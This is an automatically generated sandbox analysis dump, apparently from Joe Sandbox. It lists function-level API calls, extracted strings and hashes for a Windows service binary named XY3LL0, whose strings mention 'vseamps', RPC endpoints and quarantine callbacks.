                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                                                                            • String ID: H
                                                                                            • API String ID: 2107338056-2852464175
                                                                                            • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                                            • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                                                                            • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                                            • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                                                                            • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                                                                            • API String ID: 1322048431-2685357988
                                                                                            • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                                            • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                                                                            • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                                            • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                                            • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                                                                            • API String ID: 2984211723-3002863673
                                                                                            • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                                            • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                                                                            • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                                            • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                                                                            • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                                                                            • API String ID: 678758403-4129911376
                                                                                            • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                                            • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                                                                            • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                                            • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocProcesslstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 3424473247-0
                                                                                            • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                                            • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                                                                            • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                                            • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                                                                            • String ID: bad exception$csm$csm$csm
                                                                                            • API String ID: 3766904988-820278400
                                                                                            • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                                                            • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                                                                            • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                                                            • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                                                                            • String ID:
                                                                                            • API String ID: 2707001247-0
                                                                                            • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                                                            • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                                                                            • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                                                            • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                            • String ID: csm$csm$csm
                                                                                            • API String ID: 849930591-393685449
                                                                                            • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                                                            • Instruction ID: c008c79c6a82141b00ed32f9352116aaf4fbd8d457fd392b45dbbe9d5bf44be0
                                                                                            • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                                                            • Instruction Fuzzy Hash: B2D19E63E087418EEB209F6598407AD37A0FB657E8F100135EB6E57B95EF38E481C786
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$FreeProcess
                                                                                            • String ID:
                                                                                            • API String ID: 3859560861-0
                                                                                            • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                                            • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                                                                            • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                                            • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$FreeProcess
                                                                                            • String ID:
                                                                                            • API String ID: 3859560861-0
                                                                                            • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                                            • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                                                                            • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                                            • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeLibraryProc
                                                                                            • String ID: api-ms-$ext-ms-
                                                                                            • API String ID: 3013587201-537541572
                                                                                            • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                                            • Instruction ID: cd8a6948e53840472f4d9426f08fe61910f978aba144b9b2cc2688dc54c760fb
                                                                                            • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                                            • Instruction Fuzzy Hash: 9D41C023F29A1659EB158B22DC50AAA2290FF25BF4F484535DE2F877D4FE3CE4058281
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                                                                            • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                                            • API String ID: 1119674940-1966266597
                                                                                            • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                                            • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                                                                            • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                                            • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocProcesslstrlen$ComputerName
                                                                                            • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                                            • API String ID: 3702919091-996641649
                                                                                            • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                                            • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                                                                            • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                                            • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                                                                            APIs
                                                                                            • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                                                                            • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$Info
                                                                                            • String ID:
                                                                                            • API String ID: 1775632426-0
                                                                                            • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                                            • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                                                                            • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                                            • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF8FDF972EB,?,?,?,00007FF8FDF93EC0,?,?,?,?,00007FF8FDF93CFD), ref: 00007FF8FDF971B1
                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF8FDF972EB,?,?,?,00007FF8FDF93EC0,?,?,?,?,00007FF8FDF93CFD), ref: 00007FF8FDF971BF
                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF8FDF972EB,?,?,?,00007FF8FDF93EC0,?,?,?,?,00007FF8FDF93CFD), ref: 00007FF8FDF971E9
                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF8FDF972EB,?,?,?,00007FF8FDF93EC0,?,?,?,?,00007FF8FDF93CFD), ref: 00007FF8FDF97257
                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF8FDF972EB,?,?,?,00007FF8FDF93EC0,?,?,?,?,00007FF8FDF93CFD), ref: 00007FF8FDF97263
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                            • String ID: api-ms-
                                                                                            • API String ID: 2559590344-2084034818
                                                                                            • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                                            • Instruction ID: 0eb5d73f600c5741bf1af0106cc411f93941037330719db320321ea9ce4530cf
                                                                                            • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                                            • Instruction Fuzzy Hash: 66318222F2974199EB159B02A800D697394FF68BF0F594535DF3E467D0FE3CE4458681
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 2506987500-0
                                                                                            • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                                            • Instruction ID: 91d06644c0741f813ec758f624db02b8260ec89bd824d1db143d58204be2a439
                                                                                            • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                                            • Instruction Fuzzy Hash: 8821CF22F0C2424DFB1AA7255D919791242DFA47F0F459734EB3F0BAD6FE2CA44082C2
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true
                                                                                            • Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                            • String ID: CONOUT$
                                                                                            • API String ID: 3230265001-3130406586
                                                                                            • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                                            • Instruction ID: 2e5a3d3794156196c661f62c89068d8ad55b78d3acbce99f7c4ac12db4b2a49f
                                                                                            • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                                            • Instruction Fuzzy Hash: D4118422718A418AE7508B52F844B6572A4FB98BF4F044234EB6E87BD4EF3CD5448784
                                                                                            APIs
                                                                                            • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                                                                            • CreateEventW.KERNEL32 ref: 00000001400012C0
                                                                                              • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                                                                              • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                                                                              • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                                                                              • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                                                                              • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                                                                              • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                                                                              • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                                                                              • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                                                                              • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                                                                              • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                                                                              • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                                                                            • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                                                                            • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                                                                              • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                                                                              • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                                                                              • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                                                                              • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                                                                              • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                                                                              • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                                                                              • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                                                                              • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                                                                              • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                                                                              • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                                                                              • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                                                                              • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                                                                              • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
